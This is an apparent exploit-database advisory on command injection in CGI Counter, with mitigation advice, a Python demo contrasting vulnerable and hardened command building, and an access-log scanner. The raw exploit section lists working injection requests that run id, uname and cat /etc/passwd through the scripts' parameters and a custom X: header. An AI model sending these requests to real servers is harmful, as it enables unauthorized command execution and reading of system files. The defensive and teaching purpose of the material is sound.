Vendor: CGI Counter
By: SecurityFocus
CVSS: 7.5 (HIGH)
Class: Remote Command Execution
CWE: 78 (OS Command Injection)
Product Name: CGI Counter
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Unchecked Code in George Burgyan’s CGI Counter

George Burgyan's CGI Counter passes user-supplied request data into code that runs system commands without checking it, so a remote attacker can execute arbitrary commands with the privileges of the web server account. The published examples target two scripts: in counterfiglet, shell metacharacters in the f= path parameter let further commands follow the intended one; in counter, the lang= parameter is injected into Perl, as the example's appended system("$ENV{HTTP_X}") call shows. In both cases the attacker can carry the actual command in a custom X: request header, which the CGI interface exposes to the script as the HTTP_X environment variable, and reference that variable from the injected code.

Mitigation:

Validate user input against an allow-list of expected values (for example, a font or language name consisting only of letters, digits, '-' and '_') before it is used, and do not pass request data to a shell or to an eval at all: invoke external programs with a fixed argument list rather than with a command string built from request parameters. Treat every CGI environment variable, including request headers such as X: that appear as HTTP_X, as attacker-controlled input.
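The pattern behind both example requests, shown as an added illustration rather than CGI Counter's own source (which is not on this page): a request parameter is spliced into a command line that goes to /bin/sh, so a ';' in the value ends the intended command and starts the attacker's. The vulnerable helper below is a hypothetical reconstruction of that pattern; the hardened one rejects anything outside an assumed allow-list and passes the value as a separate argv element with no shell in between. The program name figlet, the allow-list policy and the harmless INJECTED demo payload are assumptions made for the demonstration; the two advisory payloads are copied from the requests quoted on this page.

```python
"""Command injection in a CGI parameter: vulnerable pattern beside a hardened one.

Added example; a hypothetical reconstruction of the pattern the advisory
describes, not code from George Burgyan's CGI Counter.
"""
import re
import subprocess
from urllib.parse import unquote

# Payloads copied (URL-decoded) from the advisory's example requests.
FIGLET_REQUEST = unquote("f=;echo;w;uname%20-a;id")
PERL_REQUEST = unquote('lang=english(1);system("$ENV{HTTP_X}");')

# Constructed, harmless payload used for the live demonstration below.
DEMO_REQUEST = "f=;echo INJECTED"

# Assumed allow-list: a font or language name is a short alphanumeric token.
TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def cgi_param(request_tail, name):
    """Pull name=value out of a counter-style path tail such as 'nc/f=...'.

    Everything after the first '=' is the value, so shell metacharacters
    survive untouched, which is exactly what the exploit relies on.
    """
    for part in request_tail.split("/"):
        if part.startswith(name + "="):
            return part[len(name) + 1:]
    return None


def vulnerable_command_line(font):
    """Vulnerable pattern: untrusted text is interpolated into a shell command.
    'figlet' is an assumed program name (hypothetical)."""
    return "figlet -f " + font


def run_via_shell(command_line):
    """What a CGI wrapper ends up doing when it hands the line to sh -c."""
    proc = subprocess.run(command_line, shell=True, capture_output=True, text=True)
    return proc.stdout


def accepts(value):
    """True if the value passes the assumed allow-list."""
    return value is not None and TOKEN_RE.fullmatch(value) is not None


def hardened_argv(font):
    """Hardened: validate against the allow-list, then build an argv list.

    Because the list goes to execve() rather than to a shell, ';', '|', '$'
    and quotes in the value could only ever be a literal font name.
    """
    if not accepts(font):
        raise ValueError("rejected parameter value: %r" % (font,))
    return ["figlet", "-f", font]


def run_without_shell(argv):
    """Execute an argv list directly; no shell parses the arguments."""
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    demo = cgi_param(DEMO_REQUEST, "f")
    # Vulnerable path: sh runs 'figlet -f' (which fails) and then 'echo INJECTED'.
    print(repr(run_via_shell(vulnerable_command_line(demo))))
    # Same value passed as an argv element: echo prints it literally, nothing else runs.
    print(repr(run_without_shell(["echo", demo])))
    for value in (cgi_param(FIGLET_REQUEST, "f"), cgi_param(PERL_REQUEST, "lang"), "english"):
        print("%-45r accepted=%s" % (value, accepts(value)))
```

The allow-list alone would have stopped both published payloads, since each contains ';'; the argv form is the second, independent layer, so that a value that slips past validation still cannot reach a command interpreter.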
Source (Exploit-DB raw data):

source: https://www.securityfocus.com/bid/1202/info

Due to unchecked code that handles user input in George Burgyan's CGI Counter, remote execution of arbitrary commands at the same privilege level as the web server it is running on is possible.

Examples:

http://target/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id

> telnet target www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd

> telnet target www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w
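The request lines above are what an attempt looks like in the web server's access log, so scanning that log is the quickest check for whether the exploit has been tried against a host. The following is an added example, not part of the advisory: it flags requests to the two counter scripts whose path carries shell metacharacters, a reference to HTTP_X, a Perl system() call, or a nested sh -c. The log lines are constructed in Apache combined format around the advisory's own request paths. One caveat a responder needs: the default access log does not record the attacker's custom X: header, which is where the real command lives, so detection has to key on the path and the command itself is usually not recoverable from the log.

```python
"""Scan an access log for the CGI Counter command-injection requests.

Added example, not part of the advisory. Detection keys on the request path
because a default access log does not record the custom X: header that
carries the command itself.
"""
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines. The three suspicious request
# paths are the advisory's own; the remaining traffic is invented and benign.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [01/Jan/2000:00:00:01 +0000] "GET /cgi-bin/counter/nl/ord/lang=english HTTP/1.0" 200 1024 "-" "Mozilla/4.0"',
    '10.0.0.6 - - [01/Jan/2000:00:00:02 +0000] "GET /cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id HTTP/1.0" 200 512 "-" "-"',
    '10.0.0.7 - - [01/Jan/2000:00:00:03 +0000] "GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20\\"$HTTP_X\\" HTTP/1.0" 200 300 "-" "-"',
    '10.0.0.8 - - [01/Jan/2000:00:00:04 +0000] "GET /cgi-bin/counter/nl/ord/lang=english(1);system(\\"$ENV{HTTP_X}\\"); HTTP/1.0" 200 300 "-" "-"',
    '10.0.0.9 - - [01/Jan/2000:00:00:05 +0000] "GET /index.html HTTP/1.0" 200 2048 "-" "Mozilla/4.0"',
])

# Client address and request line of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Only the two vulnerable scripts are of interest.
TARGET_RE = re.compile(r"^/cgi-bin/counter(?:figlet)?(?:/|$)")

# Each indicator is checked against the URL-decoded path.
INDICATORS = [
    ("shell metacharacter", re.compile(r"[;|`&\n]|\$\(")),
    ("HTTP_X reference", re.compile(r"\$ENV\{HTTP_X\}|\$HTTP_X")),
    ("perl system() call", re.compile(r"\bsystem\s*\(")),
    ("nested sh -c", re.compile(r"\bsh\s+-c\b")),
]


def classify_request(target):
    """Return the indicator names that match a request target, or [] when the
    request is not aimed at the counter scripts or carries nothing suspicious."""
    decoded = unquote(target)
    if not TARGET_RE.match(decoded):
        return []
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan_log(text):
    """Return a list of (client ip, decoded target, reasons) for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), unquote(m.group("target")), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print("%s %s -> %s" % (ip, target, ", ".join(reasons)))
```

Decoding before matching matters: the advisory's requests encode spaces as %20, and an attacker can just as well encode ';' as %3B, which the raw line would not reveal. A 200 status on a flagged line says nothing about success, because the scripts return a counter image either way; confirm by looking for the spawned processes or their side effects on the host.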